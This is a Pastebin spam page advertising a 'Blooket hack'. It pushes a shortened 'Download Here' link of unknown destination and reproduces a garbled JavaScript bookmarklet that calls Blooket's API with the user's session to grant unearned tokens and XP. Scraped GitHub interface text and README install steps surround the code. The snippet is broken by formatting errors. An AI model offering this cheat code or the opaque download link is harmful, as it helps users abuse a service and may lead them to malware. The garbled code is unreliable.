Advertisement
Guest User

Glizzy hub blooket hack

a guest
Nov 9th, 2024
47
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.22 KB | None | 0 0
  1. -
  2. Download Here --> https://tinyurl.com/2s39bs69 (Copy and Paste Link)
  3.  
  4.  
  5.  
  6.  
  7.  
  8.  
  9. thesmartcoder123 / Blooket Token Hack
  10. This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode characters
  11. async function getName() const response = await fetch('https://api.blooket.com/api/users/verify-token', method: "GET", headers: "accept": "application/json, text/plain, */*", "accept-language": "en-US,en;q=0.9,ru;q=0.8", >, credentials: "include" >); const data = await response.json(); return data.name; >; async function addCurrencies() const tokens = Number(prompt('How many tokens do you want to add to your account? (1000 daily)')); if (tokens > 1000) alert('You can only add up to 1000 tokens daily.'); >; const response = await fetch('https://api.blooket.com/api/users/add-rewards', method: "PUT", headers: "referer": "https://www.blooket.com/", "content-type": "application/json", >, credentials: "include", body: JSON.stringify( addedTokens: tokens, addedXp: 900, name: await getName() >) >); if (response.status == 300) alert(`$ tokens and 900 XP added to your account!`); > else alert('Not working Error Occured.'); >; >; addCurrencies();
  12. Blooket-Cheats/Blooket-Hacks
  13. This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
  14. Name already in use
  15. A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
  16. Sign In Required
  17. Please sign in to use Codespaces.
  18. Launching GitHub Desktop
  19. If nothing happens, download GitHub Desktop and try again.
  20. Launching GitHub Desktop
  21. If nothing happens, download GitHub Desktop and try again.
  22. Launching Xcode
  23. If nothing happens, download Xcode and try again.
  24. Launching Visual Studio Code
  25. Your codespace will open once ready.
  26. There was a problem preparing your codespace, please try again.
  27. Latest commit
  28. Git stats
  29. Files
  30. Failed to load latest commit information.
  31. README.md
  32. Blooket Hacks (Bookmarklet Mode)
  33. Welcome to the first repository with fully unobfuscated, working hacks. We will strive to only provide unobfuscated versions, so that people know what is in it. Please do not market it as your own, and make copies private please. We have based some of these off other peoples', with some edits to improve it.
  34.  
  35. Find the hack you want
  36. Click the copy button
  37. Add a new bookmark
  38. Go to your bookmarks
  39. Find the one you just added
  40. Press right click (tap and hold on mobile) and then "Edit"
  41. Paste or press CTRL+V in the url box
  42. Click "Done"
  43. Open the bookmark[let]
  44.  
  45. Distributed under the MIT License. See LICENSE.txt for more information.
  46.  
  47. We are NOT responsible for any actions taken on your account for using these hacks.
  48. We are in no way affiliated with Blooket in any way, shape or form.
  49. This was created solely for educational purposes.
  50.  
  51. About
  52. First Repository With Fully Unobfuscated Blooket Hacks And A Wiki About Each Hack.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement